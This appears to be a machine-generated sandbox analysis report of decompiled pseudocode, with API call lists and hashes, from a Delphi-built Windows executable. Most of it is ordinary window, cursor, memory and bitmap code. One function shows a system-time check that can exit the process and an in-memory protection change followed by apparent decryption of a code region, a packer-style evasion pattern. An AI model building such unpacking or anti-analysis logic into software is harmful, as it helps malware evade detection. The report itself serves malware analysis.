                                                                                				signed int _t2;
                                                                                				signed int _t3;
                                                                                				void* _t7;
                                                                                				int _t8;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                				void* _t17;
                                                                                				void* _t18;
                                                                                
                                                                                				_t8 = _a4;
                                                                                				if( *0x487abc == 0) {
                                                                                					 *0x487a94 = E00426184(0, _t8,  *0x487a94, _t17, _t18);
                                                                                					_t7 =  *0x487a94(_t8); // executed
                                                                                					return _t7;
                                                                                				}
                                                                                				_t3 = _t2 | 0xffffffff;
                                                                                				_t12 = _t8 + 0xffffffb4 - 2;
                                                                                				__eflags = _t12;
                                                                                				if(__eflags < 0) {
                                                                                					_t3 = 0;
                                                                                				} else {
                                                                                					if(__eflags == 0) {
                                                                                						_t8 = 0;
                                                                                					} else {
                                                                                						_t13 = _t12 - 1;
                                                                                						__eflags = _t13;
                                                                                						if(_t13 == 0) {
                                                                                							_t8 = 1;
                                                                                						} else {
                                                                                							__eflags = _t13 - 0xffffffffffffffff;
                                                                                							if(_t13 - 0xffffffffffffffff < 0) {
                                                                                								_t3 = 1;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				__eflags = _t3 - 0xffffffff;
                                                                                				if(_t3 != 0xffffffff) {
                                                                                					return _t3;
                                                                                				} else {
                                                                                					return GetSystemMetrics(_t8);
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 004262CE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                • KiUserCallbackDispatcher.NTDLL ref: 00426294
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                • String ID: GetSystemMetrics
                                                                                • API String ID: 54681038-96882338
                                                                                • Opcode ID: 264aa0b8b8c3a7d6db0cdf4a2c545720de1efd20539613c26ecbd5e8687bd64a
                                                                                • Instruction ID: 880e1060c297ee59ad63230c10489d7c0a575417c52aad937f933fdb4636618d
                                                                                • Opcode Fuzzy Hash: 264aa0b8b8c3a7d6db0cdf4a2c545720de1efd20539613c26ecbd5e8687bd64a
                                                                                • Instruction Fuzzy Hash: 1CF0C230718120CADA006A74BD8472B3A4A9B42320BE38FA7E521866D1C53C9905433D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453354(void* __eax) {
                                                                                				struct HICON__* _t5;
                                                                                				void* _t7;
                                                                                				void* _t8;
                                                                                				struct HINSTANCE__* _t11;
                                                                                				CHAR** _t12;
                                                                                				void* _t13;
                                                                                
                                                                                				_t13 = __eax;
                                                                                				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                                                				_t8 = 0xffffffea;
                                                                                				_t12 = 0x46bbb4;
                                                                                				do {
                                                                                					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                                                						if(_t8 != 0xffffffeb) {
                                                                                							_t11 = 0;
                                                                                						} else {
                                                                                							goto L4;
                                                                                						}
                                                                                					} else {
                                                                                						L4:
                                                                                						_t11 =  *0x487714; // 0x400000
                                                                                					}
                                                                                					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                                                					_t7 = E0045340C(_t13, _t5, _t8);
                                                                                					_t8 = _t8 + 1;
                                                                                					_t12 =  &(_t12[1]);
                                                                                				} while (_t8 != 0xffffffff);
                                                                                				return _t7;
                                                                                			}










                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401590(void* __eax, void** __edx) {
                                                                                				void* _t3;
                                                                                				void** _t8;
                                                                                				void* _t11;
                                                                                				long _t14;
                                                                                
                                                                                				_t8 = __edx;
                                                                                				if(__eax >= 0x100000) {
                                                                                					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                				} else {
                                                                                					_t14 = 0x100000;
                                                                                				}
                                                                                				_t8[1] = _t14;
                                                                                				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                				_t11 = _t3;
                                                                                				 *_t8 = _t11;
                                                                                				if(_t11 != 0) {
                                                                                					_t3 = E00401444(0x4875e4, _t8);
                                                                                					if(_t3 == 0) {
                                                                                						VirtualFree( *_t8, 0, 0x8000);
                                                                                						 *_t8 = 0;
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                				return _t3;
                                                                                			}








                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015BF
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0046AA08(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
                                                                                				long _v8;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				signed int _t22;
                                                                                				signed int _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t31 = _a4;
                                                                                				if(E0046A9D0( *((intOrPtr*)( *_t31))) == 0) {
                                                                                					if(E0046A9FC( *((intOrPtr*)( *_t31))) == 0) {
                                                                                						return 0;
                                                                                					}
                                                                                					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x46a9bc;
                                                                                					return 0xffffffffffffffff;
                                                                                				}
                                                                                				_t22 =  *(_t31 + 4);
                                                                                				if(( *(_t22 + 0xa0) ^ 0x00019b81) != 0x5ecca) {
                                                                                					return 0;
                                                                                				}
                                                                                				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa4), 0x1465f, 4,  &_v8); // executed
                                                                                				E0046AAF8(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa4)), 0x1465f, __edi, __esi, 0x1acd9, 0x46bd08);
                                                                                				_t29 =  *(_t31 + 4);
                                                                                				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x40a3;
                                                                                				return _t29 | 0xffffffff;
                                                                                			}










                                                                                APIs
                                                                                  • Part of subcall function 0046A9D0: GetSystemTime.KERNEL32 ref: 0046A9D7
                                                                                  • Part of subcall function 0046A9D0: ExitProcess.KERNEL32(00000000), ref: 0046A9E6
                                                                                • VirtualProtectEx.KERNEL32(000000FF,?,0001465F,00000004,?), ref: 0046AA48
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ExitProcessProtectSystemTimeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1291046601-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00440BF4(void* __ecx, void* __edi, void* __esi) {
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t8;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t14;
                                                                                				void* _t16;
                                                                                				void* _t17;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t28;
                                                                                
                                                                                				_t25 = __esi;
                                                                                				_t17 = __ecx;
                                                                                				_push(_t28);
                                                                                				_push(0x440c7a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t28;
                                                                                				 *0x487b6c =  *0x487b6c - 1;
                                                                                				if( *0x487b6c < 0) {
                                                                                					 *0x487b68 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                                                					_t31 =  *0x487b68;
                                                                                					E004409C0(_t16, __edi,  *0x487b68);
                                                                                					_t6 =  *0x431114; // 0x431160
                                                                                					E004135D4(_t6, _t16, _t17,  *0x487b68);
                                                                                					_t8 =  *0x431114; // 0x431160
                                                                                					E00413674(_t8, _t16, _t17, _t31);
                                                                                					_t21 =  *0x431114; // 0x431160
                                                                                					_t10 =  *0x442280; // 0x4422cc
                                                                                					E00413620(_t10, _t16, _t21, __esi, _t31);
                                                                                					_t22 =  *0x431114; // 0x431160
                                                                                					_t12 =  *0x440c84; // 0x440cd0
                                                                                					E00413620(_t12, _t16, _t22, __esi, _t31);
                                                                                					_t23 =  *0x431114; // 0x431160
                                                                                					_t14 =  *0x440e38; // 0x440e84
                                                                                					E00413620(_t14, _t16, _t23, _t25, _t31);
                                                                                				}
                                                                                				_pop(_t20);
                                                                                				 *[fs:eax] = _t20;
                                                                                				_push(0x440c81);
                                                                                				return 0;
                                                                                			}
















                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,00440C7A), ref: 00440C0E
                                                                                  • Part of subcall function 004409C0: GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                  • Part of subcall function 004409C0: GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                  • Part of subcall function 004409C0: RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004409C0: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                  • Part of subcall function 004409C0: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                • String ID:
                                                                                • API String ID: 3775504709-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407286(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                                				struct HWND__* _t10;
                                                                                
                                                                                				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                				return _t10;
                                                                                			}





                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407288(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                                				struct HWND__* _t10;
                                                                                
                                                                                				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                				return _t10;
                                                                                			}





                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405A3C(void* __eax) {
                                                                                				char _v272;
                                                                                				intOrPtr _t14;
                                                                                				void* _t16;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t19;
                                                                                
                                                                                				_t16 = __eax;
                                                                                				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                					_t3 = _t16 + 4; // 0x400000
                                                                                					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                					_t14 = E00405C78(_t19); // executed
                                                                                					_t18 = _t14;
                                                                                					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                					if(_t18 == 0) {
                                                                                						_t5 = _t16 + 4; // 0x400000
                                                                                						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                					}
                                                                                				}
                                                                                				_t7 = _t16 + 0x10; // 0x400000
                                                                                				return  *_t7;
                                                                                			}









                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?,00000400,?,004103FC,00413F53,00000000,00413F78), ref: 00405A5A
                                                                                  • Part of subcall function 00405C78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                  • Part of subcall function 00405C78: RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                • String ID:
                                                                                • API String ID: 2796650324-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401724(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                				signed int _v20;
                                                                                				void** _v24;
                                                                                				void* _t15;
                                                                                				void** _t16;
                                                                                				void* _t17;
                                                                                				signed int _t27;
                                                                                				intOrPtr* _t29;
                                                                                				void* _t31;
                                                                                				intOrPtr* _t32;
                                                                                
                                                                                				_v24 = __ecx;
                                                                                				 *_t32 = __edx;
                                                                                				_t31 = __eax & 0xfffff000;
                                                                                				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                				 *_v24 = _t31;
                                                                                				_t15 = _v20 - _t31;
                                                                                				_v24[1] = _t15;
                                                                                				_t29 =  *0x4875e4; // 0x753f04
                                                                                				while(_t29 != 0x4875e4) {
                                                                                					_t17 =  *(_t29 + 8);
                                                                                					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                                					if(_t31 > _t17) {
                                                                                						_t17 = _t31;
                                                                                					}
                                                                                					if(_t27 > _v20) {
                                                                                						_t27 = _v20;
                                                                                					}
                                                                                					if(_t27 > _t17) {
                                                                                						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                						if(_t15 == 0) {
                                                                                							_t16 = _v24;
                                                                                							 *_t16 = 0;
                                                                                							return _t16;
                                                                                						}
                                                                                					}
                                                                                					_t29 =  *_t29;
                                                                                				}
                                                                                				return _t15;
                                                                                			}













                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401791
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041C940(intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* _t14;
                                                                                				void _t15;
                                                                                				intOrPtr _t25;
                                                                                				char* _t26;
                                                                                				void* _t35;
                                                                                
                                                                                				if( *0x487a20 == 0) {
                                                                                					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                                                					_t35 = _t14;
                                                                                					_t15 =  *0x487a1c; // 0x700000
                                                                                					 *_t35 = _t15;
                                                                                					_t1 = _t35 + 4; // 0x4
                                                                                					E00402994(0x46b4bc, 2, _t1);
                                                                                					_t2 = _t35 + 5; // 0x5
                                                                                					 *((intOrPtr*)(_t35 + 6)) = E0041C938(_t2, E0041C918);
                                                                                					_t4 = _t35 + 0xa; // 0xa
                                                                                					_t26 = _t4;
                                                                                					do {
                                                                                						 *_t26 = 0xe8;
                                                                                						_t5 = _t35 + 4; // 0x4
                                                                                						 *((intOrPtr*)(_t26 + 1)) = E0041C938(_t26, _t5);
                                                                                						 *((intOrPtr*)(_t26 + 5)) =  *0x487a20;
                                                                                						 *0x487a20 = _t26;
                                                                                						_t26 = _t26 + 0xd;
                                                                                					} while (_t26 - _t35 < 0xffc);
                                                                                					 *0x487a1c = _t35;
                                                                                				}
                                                                                				_t25 =  *0x487a20;
                                                                                				 *0x487a20 =  *((intOrPtr*)(_t25 + 5));
                                                                                				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                                                				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                                                				return  *0x487a20;
                                                                                			}









                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction ID: 28b28392519e15f92a9e572b18f021e7989893867b799864ec383581726918ff
                                                                                • Opcode Fuzzy Hash: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction Fuzzy Hash: B21136B42443059BD710DF19CCC1B86B7E4EB48390F20C93AE9999B786D378E9418BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                C-Code - Quality: 72%
                                                                                			E0042308C(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
                                                                                				struct HBITMAP__* _v8;
                                                                                				struct HPALETTE__* _v12;
                                                                                				struct HPALETTE__* _v16;
                                                                                				struct HPALETTE__* _v20;
                                                                                				char _v24;
                                                                                				struct HDC__* _v28;
                                                                                				struct HDC__* _v32;
                                                                                				struct HDC__* _v36;
                                                                                				BITMAPINFO* _v40;
                                                                                				void* _v44;
                                                                                				intOrPtr _v48;
                                                                                				struct tagRGBQUAD _v52;
                                                                                				struct HPALETTE__* _v56;
                                                                                				intOrPtr _v116;
                                                                                				intOrPtr _v120;
                                                                                				intOrPtr _v132;
                                                                                				intOrPtr _v136;
                                                                                				void _v140;
                                                                                				char _v156;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				signed short _t229;
                                                                                				int _t281;
                                                                                				signed int _t290;
                                                                                				signed short _t292;
                                                                                				struct HBRUSH__* _t366;
                                                                                				struct HPALETTE__* _t422;
                                                                                				signed int _t441;
                                                                                				intOrPtr _t442;
                                                                                				intOrPtr _t444;
                                                                                				intOrPtr _t445;
                                                                                				void* _t455;
                                                                                				void* _t457;
                                                                                				void* _t459;
                                                                                				intOrPtr _t460;
                                                                                
                                                                                				_t457 = _t459;
                                                                                				_t460 = _t459 + 0xffffff68;
                                                                                				_push(_t419);
                                                                                				_v16 = __ecx;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_v20 = 0;
                                                                                				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
                                                                                					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
                                                                                						E00422C48(_v8);
                                                                                						_v116 = 0;
                                                                                						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
                                                                                							E0042009C();
                                                                                						}
                                                                                						_v28 = E004201BC(GetDC(0));
                                                                                						_v32 = E004201BC(CreateCompatibleDC(_v28));
                                                                                						_push(_t457);
                                                                                						_push(0x4236da);
                                                                                						_push( *[fs:edx]);
                                                                                						 *[fs:edx] = _t460;
                                                                                						if( *(_a8 + 0x18) >= 0x28) {
                                                                                							_v40 = E0040272C(0x42c);
                                                                                							_push(_t457);
                                                                                							_push(0x4233e4);
                                                                                							_push( *[fs:edx]);
                                                                                							 *[fs:edx] = _t460;
                                                                                							 *(_a8 + 0x18) = 0x28;
                                                                                							 *((short*)(_a8 + 0x24)) = 1;
                                                                                							if( *(_a8 + 0x26) == 0) {
                                                                                								_t290 = GetDeviceCaps(_v28, 0xc);
                                                                                								_t292 = GetDeviceCaps(_v28, 0xe);
                                                                                								_t419 = _t290 * _t292;
                                                                                								 *(_a8 + 0x26) = _t290 * _t292;
                                                                                							}
                                                                                							_t55 = _a8 + 0x18; // 0x18
                                                                                							memcpy(_v40, _t55, 0xa << 2);
                                                                                							 *(_a8 + 4) =  *(_a8 + 0x1c);
                                                                                							_t441 = _a8;
                                                                                							 *(_t441 + 8) =  *(_a8 + 0x20);
                                                                                							if( *(_a8 + 0x26) > 8) {
                                                                                								_t229 =  *(_a8 + 0x26);
                                                                                								if(_t229 == 0x10) {
                                                                                									L30:
                                                                                									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
                                                                                										E00423040(_a8);
                                                                                										_t441 =  &(_v40->bmiColors);
                                                                                										E00402994(_a8 + 0x40, 0xc, _t441);
                                                                                									}
                                                                                								} else {
                                                                                									_t441 = _a8;
                                                                                									if(_t229 == 0x20) {
                                                                                										goto L30;
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                                                                                									if(_v16 == 0) {
                                                                                										if(_v8 != 0) {
                                                                                											_v24 = SelectObject(_v32, _v8);
                                                                                											if(_v116 <= 0 || _v120 == 0) {
                                                                                												asm("cdq");
                                                                                												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
                                                                                											} else {
                                                                                												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
                                                                                												_t441 = _a8;
                                                                                												 *(_t441 + 0x38) = _t281;
                                                                                											}
                                                                                											_t93 =  &_v24; // 0x42394f
                                                                                											SelectObject(_v32,  *_t93);
                                                                                										}
                                                                                									} else {
                                                                                										_t441 =  &(_v40->bmiColors);
                                                                                										E00420950(_v16, 0xff, _t441);
                                                                                									}
                                                                                								} else {
                                                                                									_t441 = 0;
                                                                                									_v40->bmiColors = 0;
                                                                                									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                                                                                								}
                                                                                							}
                                                                                							_v20 = E004201BC(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
                                                                                							if(_v44 == 0) {
                                                                                								E00420114(_t419);
                                                                                							}
                                                                                							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
                                                                                								_pop(_t442);
                                                                                								 *[fs:eax] = _t442;
                                                                                								_push(0x4233eb);
                                                                                								return E0040274C(_v40);
                                                                                							} else {
                                                                                								asm("cdq");
                                                                                								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
                                                                                								E00403E2C();
                                                                                								E00403E2C();
                                                                                								goto L61;
                                                                                							}
                                                                                						} else {
                                                                                							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
                                                                                								_v20 = E004201BC(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
                                                                                							} else {
                                                                                								_v20 = E004201BC(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
                                                                                							}
